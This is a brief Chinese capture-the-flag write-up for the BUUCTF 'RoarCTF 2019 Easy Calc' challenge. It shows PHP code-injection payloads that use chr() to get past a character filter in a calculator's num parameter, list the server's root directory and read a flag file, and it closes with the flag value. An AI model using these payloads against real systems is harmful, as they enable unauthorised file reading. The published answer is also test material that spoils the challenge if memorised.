BUUCTF---[RoarCTF 2019]Easy Calc1

1.题目描述

2.搜索网址是一个计算器,输入正常的运算,可以运算

3.查看源码,发现有一个calc.php

4.访问calc.php,代码提示用get方式传输num参数,但是过滤了\等等。

5.构造play load,发现了一个f1agg.

复制代码
num=print_r(scandir(chr(47)))

chr(47)是"/"的ASCII编码

scandir()是用来扫描文件目录

print_r是将扫描结果打印出来

6.尝试访问f1agg

复制代码
num=print_r(file_get_contents(chr(47).f1agg))

file_get_conctents()用来读取f1agg里面的内容,最后print_r将内容输出

7.

复制代码
flag{de45bb5f-1b75-4b33-99fb-904f876df79f} 
相关推荐
花青泽9 小时前
子域名基础04_DNS数据与记录
web安全
花青泽12 小时前
第2章_阶段1_准备
web安全
杭州领祺科技12 小时前
27 号令横向隔离落地清单:储能边缘计算网关 ≠ 电力专用网闸,算电协同中心安全分区/纵向加密/SPDnet 怎么配
人工智能·安全·网络安全·边缘计算·储能·电力·电力监控
花青泽14 小时前
子域名基础05_Web与网络层
web安全
菩提小狗15 小时前
每日安全情报报告 · 2026-10-04
网络安全·漏洞·cve·安全情报·每日安全
花青泽15 小时前
子域名挖掘全局流程
web安全
迪康coolmu15 小时前
屏幕水印与防拍照落地:从水印类型到泄密溯源的完整配置
运维·网络·安全·网络安全·数据安全
Seraphina3616 小时前
DVWA(SQL Injection-High,XSS Reflected-Medium,XSS Stored-Medium)
数据库·经验分享·sql·网络安全·xss
sogw-三叶草️17 小时前
HITCON CTF 2014 — stkof · Unsafe Unlink
网络·安全·web安全·pwn·堆·二进制安全·堆漏洞
Seraphina361 天前
SQLI-labs(一)黑盒全流程
sql·安全·web安全